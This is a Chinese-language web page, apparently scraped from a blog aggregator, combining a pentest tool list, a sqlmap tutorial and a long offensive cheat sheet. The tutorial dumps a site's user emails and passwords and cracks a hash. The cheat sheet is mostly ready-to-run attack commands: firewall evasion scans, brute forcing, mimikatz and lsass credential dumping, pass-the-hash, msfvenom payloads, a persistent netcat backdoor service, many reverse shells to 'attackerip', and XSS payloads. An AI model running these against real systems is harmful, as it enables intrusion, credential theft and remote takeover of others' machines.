    • mimikatz - 适用于Windows操作系统的凭据提取工具。
    • redsnarf - 用于从Windows工作站,服务器和域控制器检索密码哈希和凭据的后期利用工具。
    • wePWNise - 生成与Office文档或模板中使用的体系结构无关的VBA代码,并自动绕过应用程序控制并利用缓解软件。

    macOS实用工具

    • Bella - 用于macOS的纯Python后期开发数据挖掘和远程管理工具。
    • EvilOSX - 模块化RAT,使用大量的逃避和渗透技术开箱即用。

    执照

    由Google翻译自:https://github.com/enaqx/awesome-pentest

    https://github.com/Al1ex/awesome-pentest

    展开全文
  • Android渗透测试工具

    2018-03-23 16:22:55
    Android渗透测试工具
  • Core Impact产品融合了Core Security公司实时漏洞研究和尖端风险评估技术,对企业敏感数据和关键架构进行一系列安全攻击,为企业进行深入的安全测试,从而更广泛了解数据泄露的原因、影响以及预防方案。
  • 渗透测试工具,爆破解密 渗透测试工具,爆破解密 可帮解答
  • 最全渗透测试工具讲解了百分之80测试过程中用到的工具,利用工具来最全面的发现漏洞。 sql手工注入不仅可以验证工具扫描出来的漏洞是否存在,更可以直接利用漏洞获取服务器权限。
  • 对于网络安全人员来说,掌握渗透工具的使用方法是一项必备的技能。然而,一个没有师傅带领的小白在刚开始学习时,并不知道该如何入手进行渗透学习,所以本文旨在帮助这些小白入门。 sqlmap是一款非常强大的开源sql...

    对于网络安全人员来说,掌握渗透工具的使用方法是一项必备的技能。然而,一个没有师傅带领的小白在刚开始学习时,并不知道该如何入手进行渗透学习,所以本文旨在帮助这些小白入门。

    sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。它由Python语言开发而成,因此运行需要安装python环境。


    既然本文是基础教程,以下只写工具的基本使用方法。

    本教程为sqlmap具体应用案例,如需了解更多sqlmap资料可以访问官方http://sqlmap.org ,或者乌云知识库http://drops.wooyun.org/tips/401 和 http://drops.wooyun.org/tips/143 。


    测试环境:本地搭建的具有sql注入点的网站 http://192.168.1.150

    注意:sqlmap只是用来检测和利用sql注入点的,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。


    教程开始:

    一、检测注入点是否可用

    [plain] view plain copy
     在CODE上查看代码片派生到我的代码片
    1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134"  
    参数:

    -u:指定注入点url

    结果:



    注入结果展示:

    (1)注入参数id为GET注入,注入类型有四种分别为:boolean-based blind、error-based、stacked queries、inline query。

    (2)web服务器系统为windows 2003 or XP

    (3)web应用程序技术为:ASP.NET, Microsoft IIS 6.0

    (4)数据库类型为:SQLSERVER 2000


    其中图一有若干询问语句,需要用户输入[Y/N],如果你懒得输入或者不懂怎么输入可以让程序自动输入,只需添加一个参数即可,命令如下:

    [plain] view plain copy
     在CODE上查看代码片派生到我的代码片
    1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --batch  

    二、暴库

    一条命令即可曝出该sqlserver中所有数据库名称,命令如下:

    [plain] view plain copy
     在CODE上查看代码片派生到我的代码片
    1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --dbs  

    参数:

    --dbs:dbs前面有两条杠,请看清楚。

    结果:


    结果显示该sqlserver中共包含7个可用的数据库。


    三、web当前使用的数据库

    [plain] view plain copy
     在CODE上查看代码片派生到我的代码片
    1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-db  


    四、web数据库使用账户

    [plain] view plain copy
     在CODE上查看代码片派生到我的代码片
    1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-user  



    五、列出sqlserver所有用户

    [plain] view plain copy
     在CODE上查看代码片派生到我的代码片
    1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --users  


    六、数据库账户与密码

    [plain] view plain copy
     在CODE上查看代码片派生到我的代码片
    1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --passwords  


    七、列出数据库中的表

    [plain] view plain copy
     在CODE上查看代码片派生到我的代码片
    1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata --tables  
    参数:

    -D:指定数据库名称

    --tables:列出表

    结果:



    结果体现共列出了34张表。


    八、列出表中字段

    [plain] view plain copy
     在CODE上查看代码片派生到我的代码片
    1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb --columns  

    参数:

    -D:指定数据库名称

    -T:指定要列出字段的表

    --columns:指定列出字段

    结果:


    结果显示该userb表中包含了23条字段。


    九、暴字段内容

    [plain] view plain copy
     在CODE上查看代码片派生到我的代码片
    1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --dump  
    参数:

    -C :指定要暴的字段

    --dump:将结果导出

    结果:


    如果字段内容太多,需要花费很多时间。可以指定导出特定范围的字段内容,命令如下:

    [plain] view plain copy
     在CODE上查看代码片派生到我的代码片
    1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --start 1 --stop 10 --dump  
    参数:

    --start:指定开始的行

    --stop:指定结束的行

    此条命令的含义为:导出数据库tourdata中的表userb中的字段(email,Username,userpassword)中的第1到第10行的数据内容。

    结果如下:




    十、验证结果

    通过上图结果看到其中的一个用户信息为:

    email:123456@qq.com

    username: 1.asp

    password: 49ba59abbe56e057

    通过md5解密,得到该hash的原文密码为:123456


    拿到账号密码我们来测试是否可以登录,登录结果如下:


    验证成功!

    当然我们只是拿到普通会员账号进行登录,你也可以拿到管理员账号进行登录,后面的事情自己发挥吧,嘿嘿!

    展开全文
  • Kali 渗透测试工具实战技巧合集 Kali 渗透测试工具实战技巧合集
  • 本文为作者总结自己在渗透测试中常用的一些小技巧。原文分为两部分,译者将其合二为一,方便大家查阅。最好的 NMAP 扫描策略# 适用所有大小网络最好的 nmap 扫描策略 # 主机发现,生成存活主机列表 $ nmap -sn -T4 ...

    本文为作者总结自己在渗透测试中常用的一些小技巧。原文分为两部分,译者将其合二为一,方便大家查阅。


    最好的 NMAP 扫描策略

    # 适用所有大小网络最好的 nmap 扫描策略
    
    # 主机发现,生成存活主机列表
    $ nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0/24
    $ grep "Status: Up" Discovery.gnmap | cut -f 2 -d ' ' > LiveHosts.txt
    
    # 端口发现,发现大部分常用端口
    # http://nmap.org/presentations/BHDC08/bhdc08-slides-fyodor.pdf
    $ nmap -sS -T4 -Pn -oG TopTCP -iL LiveHosts.txt
    $ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt
    $ nmap -sS -T4 -Pn --top-ports 3674 -oG 3674 -iL LiveHosts.txt
    
    # 端口发现,发现全部端口,但 UDP 端口的扫描会非常慢
    $ nmap -sS -T4 -Pn -p 0-65535 -oN FullTCP -iL LiveHosts.txt
    $ nmap -sU -T4 -Pn -p 0-65535 -oN FullUDP -iL LiveHosts.txt
    
    # 显示 TCP\UDP 端口
    $ grep "open" FullTCP|cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' |xargs | sed 's/ /,/g'|awk '{print "T:"$0}'
    $ grep "open" FullUDP|cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' |xargs | sed 's/ /,/g'|awk '{print "U:"$0}'
    
    # 侦测服务版本
    $ nmap -sV -T4 -Pn -oG ServiceDetect -iL LiveHosts.txt
    
    # 扫做系统扫描
    $ nmap -O -T4 -Pn -oG OSDetect -iL LiveHosts.txt
    
    # 系统和服务检测
    $ nmap -O -sV -T4 -Pn -p U:53,111,137,T:21-25,80,139,8080 -oG OS_Service_Detect -iL LiveHosts.txt
    

    Nmap – 躲避防火墙

    # 分段
    $ nmap -f
    
    # 修改默认 MTU 大小,但必须为 8 的倍数(8,16,24,32 等等)
    $ nmap --mtu 24
    
    # 生成随机数量的欺骗
    $ nmap -D RND:10 [target]
    
    # 手动指定欺骗使用的 IP
    $ nmap -D decoy1,decoy2,decoy3 etc.
    
    # 僵尸网络扫描, 首先需要找到僵尸网络的IP
    $ nmap -sI [Zombie IP] [Target IP]
    
    # 指定源端口号
    $ nmap --source-port 80 IP
    
    # 在每个扫描数据包后追加随机数量的数据
    $ nmap --data-length 25 IP
    
    # MAC 地址欺骗,可以生成不同主机的 MAC 地址
    $ nmap --spoof-mac Dell/Apple/3Com IP
    

    Nmap 进行 Web 漏洞扫描

    cd /usr/share/nmap/scripts/
    wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz
    nmap -sS -sV --script=vulscan/vulscan.nse target
    nmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv target
    nmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv -p80 target
    nmap -PN -sS -sV --script=vulscan –script-args vulscancorrelation=1 -p80 target
    nmap -sV --script=vuln target
    nmap -PN -sS -sV --script=all –script-args vulscancorrelation=1 target
    

    使用 DIRB 爆破目录

    注:DIRB 是一个专门用于爆破目录的工具,在 Kali 中默认已经安装,类似工具还有国外的patatordirsearchDirBuster, 国内的御剑等等。

    dirb http://IP:PORT /usr/share/dirb/wordlists/common.txt
    

    Patator – 全能暴力破解测试工具

    # git clone https://github.com/lanjelot/patator.git /usr/share/patator
    
    # SMTP 爆破
    $ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst
    $ patator smtp_login host=192.168.17.129 user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
    $ patator smtp_login host=192.168.17.129 helo='ehlo 192.168.17.128' user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
    $ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst -x ignore:fgrep='incorrect password or account name'
    

    使用 Fierce 爆破 DNS

    注:Fierce 会检查 DNS 服务器是否允许区域传送。如果允许,就会进行区域传送并通知用户,如果不允许,则可以通过查询 DNS 服务器枚举主机名。类似工具:subDomainsBrute 和 SubBrute 等等

    # http://ha.ckers.org/fierce/
    $ ./fierce.pl -dns example.com
    $ ./fierce.pl –dns example.com –wordlist myWordList.txt
    

    使用 Nikto 扫描 Web 服务

    nikto -C all -h http://IP
    

    扫描 WordPress

    git clone https://github.com/wpscanteam/wpscan.git && cd wpscan
    ./wpscan –url http://IP/ –enumerate p
    

    HTTP 指纹识别

    wget http://www.net-square.com/_assets/httprint_linux_301.zip && unzip httprint_linux_301.zip
    cd httprint_301/linux/
    ./httprint -h http://IP -s signatures.txt
    

    使用 Skipfish 扫描

    注:Skipfish 是一款 Web 应用安全侦查工具,Skipfish 会利用递归爬虫和基于字典的探针生成一幅交互式网站地图,最终生成的地图会在通过安全检查后输出。

    skipfish -m 5 -LY -S /usr/share/skipfish/dictionaries/complete.wl -o ./skipfish2 -u http://IP
    

    使用 NC 扫描

    nc -v -w 1 target -z 1-1000
    for i in {101..102}; do nc -vv -n -w 1 192.168.56.$i 21-25 -z; done
    

    Unicornscan

    注:Unicornscan 是一个信息收集和安全审计的工具。

    us -H -msf -Iv 192.168.56.101 -p 1-65535
    us -H -mU -Iv 192.168.56.101 -p 1-65535
    
    -H 在生成报告阶段解析主机名
    -m 扫描类型 (sf - tcp, U - udp)
    -Iv - 详细
    

    使用 Xprobe2 识别操作系统指纹

    xprobe2 -v -p tcp:80:open IP
    

    枚举 Samba

    nmblookup -A target
    smbclient //MOUNT/share -I target -N
    rpcclient -U "" target
    enum4linux target
    

    枚举 SNMP

    snmpget -v 1 -c public IP
    snmpwalk -v 1 -c public IP
    snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP
    

    实用的 Windows cmd 命令

    net localgroup Users
    net localgroup Administrators
    search dir/s *.doc
    system("start cmd.exe /k $cmd")
    sc create microsoft_update binpath="cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe" start= auto error= ignore
    /c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779
    mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"
    Procdump.exe -accepteula -ma lsass.exe lsass.dmp
    mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"
    C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp 32 位系统
    C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp 64 位系统
    

    PuTTY 连接隧道

    转发远程端口到目标地址
    plink.exe -P 22 -l root -pw "1234" -R 445:127.0.0.1:445 IP
    

    Meterpreter 端口转发

    # https://www.offensive-security.com/metasploit-unleashed/portfwd/
    # 转发远程端口到目标地址
    meterpreter > portfwd add –l 3389 –p 3389 –r 172.16.194.141
    kali > rdesktop 127.0.0.1:3389
    

    开启 RDP 服务

    reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
    netsh firewall set service remoteadmin enable
    netsh firewall set service remotedesktop enable
    

    关闭 Windows 防火墙

    netsh firewall set opmode disable
    

    Meterpreter VNC\RDP

    # https://www.offensive-security.com/metasploit-unleashed/enabling-remote-desktop/
    run getgui -u admin -p 1234
    run vnc -p 5043
    

    使用 Mimikatz

    获取 Windows 明文用户名密码

    git clone https://github.com/gentilkiwi/mimikatz.git
    privilege::debug
    sekurlsa::logonPasswords full
    

    获取哈希值

    git clone https://github.com/byt3bl33d3r/pth-toolkit
    pth-winexe -U hash //IP cmd
    
    或者
    
    apt-get install freerdp-x11
    xfreerdp /u:offsec /d:win2012 /pth:HASH /v:IP
    
    在或者
    
    meterpreter > run post/windows/gather/hashdump
    Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
    msf > use exploit/windows/smb/psexec
    msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
    msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
    msf exploit(psexec) > exploit
    meterpreter > shell
    

    使用 Hashcat 破解密码

    hashcat -m 400 -a 0 hash /root/rockyou.txt
    

    使用 NC 抓取 Banner 信息

    nc 192.168.0.10 80
    GET / HTTP/1.1
    Host: 192.168.0.10
    User-Agent: Mozilla/4.0
    Referrer: www.example.com
    <enter>
    <enter>
    

    使用 NC 在 Windows 上反弹 shell

    c:>nc -Lp 31337 -vv -e cmd.exe
    nc 192.168.0.10 31337
    c:>nc example.com 80 -e cmd.exe
    nc -lp 80
    
    nc -lp 31337 -e /bin/bash
    nc 192.168.0.10 31337
    nc -vv -r(random) -w(wait) 1 192.168.0.10 -z(i/o error) 1-1000
    

    查找 SUID\SGID root 文件

    # 查找 SUID root 文件
    find / -user root -perm -4000 -print
    
    # 查找 SGID root 文件:
    find / -group root -perm -2000 -print
    
    # 查找 SUID 和 SGID 文件:
    find / -perm -4000 -o -perm -2000 -print
    
    # 查找不属于任何用户的文件:
    find / -nouser -print
    
    # 查找不属于任何用户组的文件:
    find / -nogroup -print
    
    # 查找软连接及其指向:
    find / -type l -ls
    

    Python shell

    python -c 'import pty;pty.spawn("/bin/bash")'
    

    Python\Ruby\PHP HTTP 服务器

    python2 -m SimpleHTTPServer
    python3 -m http.server
    ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888, 
     ocumentRoot => Dir.pwd).start"
    php -S 0.0.0.0:8888
    

    获取进程对应的 PID

    fuser -nv tcp 80
    fuser -k -n tcp 80
    

    使用 Hydra 爆破 RDP

    hydra -l admin -P /root/Desktop/passwords -S X.X.X.X rdp
    

    挂载远程 Windows 共享文件夹

    smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
    

    Kali 下编译 Exploit

    gcc -m32 -o output32 hello.c (32 位)
    gcc -m64 -o output hello.c (64 位)
    

    Kali 下编译 Windows Exploit

    wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
    wine mingw-get-setup.exe
    select mingw32-base
    cd /root/.wine/drive_c/windows
    wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip
    cd /root/.wine/drive_c/MinGW/bin
    wine gcc -o ability.exe /tmp/exploit.c -lwsock32
    wine ability.exe
    

    NASM 命令

    注:NASM 全称 The Netwide Assembler,是一款基于80×86和x86-64平台的汇编语言编译程序,其设计初衷是为了实现编译器程序跨平台和模块化的特性。

    nasm -f bin -o payload.bin payload.asm
    nasm -f elf payload.asm; ld -o payload payload.o; objdump -d payload
    

    SSH 穿透

    ssh -D 127.0.0.1:1080 -p 22 user@IP
    Add socks4 127.0.0.1 1080 in /etc/proxychains.conf
    proxychains commands target
    

    SSH 穿透从一个网络到另一个网络

    ssh -D 127.0.0.1:1080 -p 22 user1@IP1
    Add socks4 127.0.0.1 1080 in /etc/proxychains.conf
    proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2
    Add socks4 127.0.0.1 1081 in /etc/proxychains.conf
    proxychains commands target
    

    使用 metasploit 进行穿透

    route add X.X.X.X 255.255.255.0 1
    use auxiliary/server/socks4a
    run
    proxychains msfcli windows/* PAYLOAD=windows/meterpreter/reverse_tcp LHOST=IP LPORT=443 RHOST=IP E
    
    或者
    
    # https://www.offensive-security.com/metasploit-unleashed/pivoting/
    meterpreter > ipconfig
    IP Address  : 10.1.13.3
    meterpreter > run autoroute -s 10.1.13.0/24
    meterpreter > run autoroute -p
    10.1.13.0          255.255.255.0      Session 1
    meterpreter > Ctrl+Z
    msf auxiliary(tcp) > use exploit/windows/smb/psexec
    msf exploit(psexec) > set RHOST 10.1.13.2
    msf exploit(psexec) > exploit
    meterpreter > ipconfig
    IP Address  : 10.1.13.2
    

    基于 CSV 文件查询 Exploit-DB

    git clone https://github.com/offensive-security/exploit-database.git
    cd exploit-database
    ./searchsploit –u
    ./searchsploit apache 2.2
    ./searchsploit "Linux Kernel"
    
    cat files.csv | grep -i linux | grep -i kernel | grep -i local | grep -v dos | uniq | grep 2.6 | egrep "<|<=" | sort -k3
    

    MSF Payloads

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> X > system.exe
    msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 R > exploit.php
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -a x86 --platform win -f asp -o file.asp
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e x86/shikata_ga_nai -b "\x00" -a x86 --platform win -f c
    

    MSF 生成在 Linux 下反弹的 Meterpreter Shell

    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -f elf -a x86 --platform linux -o shell
    

    MSF 生成反弹 Shell (C Shellcode)

    msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -b "\x00\x0a\x0d" -a x86 --platform win -f c
    

    MSF 生成反弹 Python Shell

    msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py
    

    MSF 生成反弹 ASP Shell

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp -a x86 --platform win -o shell.asp
    

    MSF 生成反弹 Bash Shell

    msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.sh
    

    MSF 生成反弹 PHP Shell

    msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.php
    add <?php at the beginning
    perl -i~ -0777pe's/^/<?php \n/' shell.php
    

    MSF 生成反弹 Win Shell

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -a x86 --platform win -o shell.exe
    

    Linux 常用安全命令

    # 使用 uid 查找对应的程序
    find / -uid 0 -perm -4000
    
    # 查找哪里拥有写权限
    find / -perm -o=w
    
    # 查找名称中包含点和空格的文件
    find / -name " " -print
    find / -name ".." -print
    find / -name ". " -print
    find / -name " " -print
    
    # 查找不属于任何人的文件
    find / -nouser
    
    # 查找未链接的文件
    lsof +L1
    
    # 获取进程打开端口的信息
    lsof -i
    
    # 看看 ARP 表中是否有奇怪的东西
    arp -a
    
    # 查看所有账户
    getent passwd
    
    # 查看所有用户组
    getent group
    
    # 列举所有用户的 crontabs
    for user in $(getent passwd|cut -f1 -d:); do echo "### Crontabs for $user ####"; crontab -u $user -l; done
    
    # 生成随机密码
    cat /dev/urandom| tr -dc ‘a-zA-Z0-9-_!@#$%^&*()_+{}|:<>?=’|fold -w 12| head -n 4
    
    # 查找所有不可修改的文件
    find . | xargs -I file lsattr -a file 2>/dev/null | grep ‘^….i’
    
    # 使文件不可修改
    chattr -i file
    

    Windows 缓冲区溢出利用命令

    msfvenom -p windows/shell_bind_tcp -a x86 --platform win -b "\x00" -f c
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 -a x86 --platform win -e x86/shikata_ga_nai -b "\x00" -f c
    
    COMMONLY USED BAD CHARACTERS:
    \x00\x0a\x0d\x20                              For http request
    \x00\x0a\x0d\x20\x1a\x2c\x2e\3a\x5c           Ending with (0\n\r_)
    
    # 常用命令:
    pattern create
    pattern offset (EIP Address)
    pattern offset (ESP Address)
    add garbage upto EIP value and add (JMP ESP address) in EIP . (ESP = shellcode )
    
    !pvefindaddr pattern_create 5000
    !pvefindaddr suggest
    !pvefindaddr modules
    !pvefindaddr nosafeseh
    
    !mona config -set workingfolder C:\Mona\%p
    !mona config -get workingfolder
    !mona mod
    !mona bytearray -b "\x00\x0a"
    !mona pc 5000
    !mona po EIP
    !mona suggest
    

    SEH – 结构化异常处理

    注:SEH(“Structured Exception Handling”),即结构化异常处理,是 windows 操作系统提供给程序设计者的强有力的处理程序错误或异常的武器。

    # https://en.wikipedia.org/wiki/Microsoft-specific_exception_handling_mechanisms#SEH
    # http://baike.baidu.com/view/243131.htm
    !mona suggest
    !mona nosafeseh
    nseh="\xeb\x06\x90\x90" (next seh chain)
    iseh= !pvefindaddr p1 -n -o -i (POP POP RETRUN or POPr32,POPr32,RETN)
    

    ROP (DEP)

    注:ROP(“Return-Oriented Programming”)是计算机安全漏洞利用技术,该技术允许攻击者在安全防御的情况下执行代码,如不可执行的内存和代码签名。

    DEP(“Data Execution Prevention”)是一套软硬件技术,在内存上严格将代码和数据进行区分,防止数据当做代码执行。

    # https://en.wikipedia.org/wiki/Return-oriented_programming
    # https://zh.wikipedia.org/wiki/%E8%BF%94%E5%9B%9E%E5%AF%BC%E5%90%91%E7%BC%96%E7%A8%8B
    # https://en.wikipedia.org/wiki/Data_Execution_Prevention
    # http://baike.baidu.com/item/DEP/7694630
    !mona modules
    !mona ropfunc -m *.dll -cpb "\x00\x09\x0a"
    !mona rop -m *.dll -cpb "\x00\x09\x0a" (auto suggest)
    

    ASLR – 地址空间格局随机化

    # https://en.wikipedia.org/wiki/Address_space_layout_randomization
    # http://baike.baidu.com/view/3862310.htm
    !mona noaslr
    

    寻蛋(EGG Hunter)技术

    Egg hunting这种技术可以被归为“分级shellcode”,它主要可以支持你用一小段特制的shellcode来找到你的实际的(更大的)shellcode(我们的‘鸡蛋‘),原理就是通过在内存中搜索我们的最终shellcode。换句话说,一段短代码先执行,然后再去寻找真正的shellcode并执行。– 参考自看雪论坛,更多详情可以查阅我在代码注释中增加的链接。

    # https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/
    # http://www.pediy.com/kssd/pediy12/116190/831793/45248.pdf
    # http://www.fuzzysecurity.com/tutorials/expDev/4.html
    !mona jmp -r esp
    !mona egg -t lxxl
    \xeb\xc4 (jump backward -60)
    buff=lxxllxxl+shell
    !mona egg -t 'w00t'
    

    GDB Debugger 常用命令

    # 设置断点
    break *_start
    
    # 执行下一个命令
    next
    step
    n
    s
    
    # 继续执行
    continue
    c
    
    # 数据
    checking 'REGISTERS' and 'MEMORY'
    
    # 显示寄存器的值: (Decimal,Binary,Hex)
    print /d –> Decimal
    print /t –> Binary
    print /x –> Hex
    O/P :
    (gdb) print /d $eax
    $17 = 13
    (gdb) print /t $eax
    $18 = 1101
    (gdb) print /x $eax
    $19 = 0xd
    (gdb)
    
    # 显示特定内存地址的值
    command : x/nyz (Examine)
    n –> Number of fields to display ==>
    y –> Format for output ==> c (character) , d (decimal) , x (Hexadecimal)
    z –> Size of field to be displayed ==> b (byte) , h (halfword), w (word 32 Bit)
    

    BASH 反弹 Shell

    bash -i >& /dev/tcp/X.X.X.X/443 0>&1
    
    exec /bin/bash 0&0 2>&0
    exec /bin/bash 0&0 2>&0
    
    0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
    
    0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
    
    exec 5<>/dev/tcp/attackerip/4444 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done
    exec 5<>/dev/tcp/attackerip/4444
    
    cat <&5 | while read line; do $line 2>&5 >&5; done # or:
    while read line 0<&5; do $line 2>&5 >&5; done
    
    /bin/bash -i > /dev/tcp/attackerip/8080 0<&1 2>&1
    /bin/bash -i > /dev/tcp/X.X.X.X/443 0<&1 2>&1
    

    PERL 反弹 Shell

    perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
    
    # Win 平台
    perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
    perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’
    

    RUBY 反弹 Shell

    ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
    
    # Win 平台
    ruby -rsocket -e 'c=TCPSocket.new("attackerip","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
    ruby -rsocket -e 'f=TCPSocket.open("attackerip","443").to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
    

    PYTHON 反弹 Shell

    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attackerip",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
    

    PHP 反弹 Shell

    php -r '$sock=fsockopen("attackerip",443);exec("/bin/sh -i <&3 >&3 2>&3");'
    

    JAVA 反弹 Shell

    r = Runtime.getRuntime()
    p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/attackerip/443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
    p.waitFor()
    

    NETCAT 反弹 Shell

    nc -e /bin/sh attackerip 4444
    nc -e /bin/sh 192.168.37.10 443
    
    # 如果 -e 参数被禁用,可以尝试以下命令
    # mknod backpipe p && nc attackerip 443 0<backpipe | /bin/bash 1>backpipe
    /bin/sh | nc attackerip 443
    rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4443 0/tmp/
    
    # 如果你安装错了 netcat 的版本,请尝试以下命令
    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip >/tmp/f
    

    TELNET 反弹 Shell

    # 如果 netcat 不可用或者 /dev/tcp
    mknod backpipe p && telnet attackerip 443 0<backpipe | /bin/bash 1>backpipe
    

    XTERM 反弹 Shell

    # http://baike.baidu.com/view/418628.htm
    # 开启 X 服务器 (:1 – 监听 TCP 端口 6001)
    apt-get install xnest
    Xnest :1
    
    # 记得授权来自目标 IP 的连接
    xterm -display 127.0.0.1:1
    
    # 授权访问
    xhost +targetip
    
    # 在目标机器上连接回我们的 X 服务器
    xterm -display attackerip:1
    /usr/openwin/bin/xterm -display attackerip:1
    or
    $ DISPLAY=attackerip:0 xterm
    

    XSS 备忘录

    https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
    ("< iframes > src=http://IP:PORT </ iframes >")
    
    <script>document.location=http://IP:PORT</script>
    
    ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//–></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
    
    ";!–"<XSS>=&amp;amp;{()}
    
    <IMG SRC="javascript:alert('XSS');">
    <IMG SRC=javascript:alert('XSS')>
    <IMG """><SCRIPT>alert("XSS")</SCRIPT>"">
    <IMG SRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41;>
    
